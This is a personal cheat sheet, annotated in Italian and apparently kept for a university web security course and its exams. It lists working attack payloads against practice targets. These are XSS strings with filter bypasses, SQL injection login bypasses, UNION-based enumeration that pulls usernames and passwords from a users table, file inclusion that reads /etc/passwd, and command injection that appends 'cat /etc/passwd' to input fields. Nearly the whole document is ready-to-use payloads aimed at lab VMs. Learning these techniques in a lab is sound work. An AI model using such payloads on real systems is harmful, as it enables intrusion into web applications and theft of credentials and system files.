##########################################################################################
## WEB ###################################################################################
##########################################################################################

#### XSS ###################################################################################
# Example 1
http://172.17.0.2/xss/example1.php?name=<script>alert('ciao');</script>

# Example 2
http://172.17.0.2/xss/example2.php?name=<Script>alert('ciao');</Script>

# Example 3
http://172.17.0.2/xss/example3.php?name=<scr<script>ipt>alert('ciao');</scr</script>ipt>

# Example 4
http://172.17.0.2/xss/example4.php?name=<img src='' onerror="alert('ciao')"/>

# Example 5
http://172.17.0.2/xss/example5.php?name=<img src='' onerror="console.log('ciao')"/>

# Example 6 
http://172.17.0.2/xss/example6.php?name=";alert('ciao');"

#### SQL ###################################################################################
# Example 1
http://172.17.0.2/sqli/example1.php?name='or'1'='1

# Example 2 --> come quella prima ma non accetta spazi, la query si può scrivere anche senza spazi
http://172.17.0.2/sqli/example2.php?name=a'OR'1=1

# Example 3 
http://172.17.0.2/sqli/example2.php?name=a'OR'1=1

# Example 4 --> mysql_real_escape_string , per oltrepassarlo lavorare sulla codifica dei caratteri 
http://172.17.0.2/sqli/example4.php?id=1%20OR%201%3D1c 
# PS: si legge come id=1 OR 1=1 
# %20 è spazio
# %3D è =

# Example 5
http://172.17.0.2/sqli/example5.php?id=900 or 1=1

# Example 6
http://172.17.0.2/sqli/example6.php?id=1 or 1=1
http://172.17.0.2/sqli/example6.php?id=id or 1=1--59

# Example 7 --> %0A è newline
http://172.17.0.2/sqli/example7.php?id=-900%0Aor 1=1

#### SQL UNION BASED ######################################################################
# 1. Controlla quanti sono i campi della query (quelli dopo la union, affinché funzioni devono essere lo stesso numero)
	- ' union select null # (da errore, numero campi non uguale)
	- ' union select null, null # (è giusto, son due i campi, puoi verificare vedendo la query)
# 2. Per recuperare il database corrente
	- ' union select null, database() #
# 3. Per enumerare tabelle e colonne
	- ' union select null, schema_name from information_schema.schemata #
	- ' union select null, table_name from information_schema.tables #
	- ' union select null, table_name from information_schema.tables where table_schema ='dvwa' #
	- (enumerazione colonne di users)
	  ' union select null, column_name from information_schema.columns where table_name ='users' #
# 4. Selezioniamo username e password
	- ' union select user, password from users # 

# esame_20220611
http://0.0.0.0:8000/login?username=admin&password=' or 1=1--

# 11 Giugno 2021
http://0.0.0.0:8000/login?username=admin&password=' oR 1 LIKE 1--

#### FILE INCLUDE ##########################################################################
# Example 1
http://172.17.0.2/fileincl/example1.php?page=/etc/passwd

# Example 2 --> non viene --> filtro dei null ??
...

# Esame 25 Giugno 2021
http://0.0.0.0:8000/?path=//etc/passw*

#### COMMAND INJECTION #####################################################################
# Example 1
http://172.17.0.2/commandexec/example1.php?ip=127.0.0.1;cat /etc/passwd

# Example 2 --> filtro stronzo su ip
...

# Esame 14 Gennaio 2022
http://localhost:8000/?domain=www.ulisse.unibo.it | more /etc/passw*
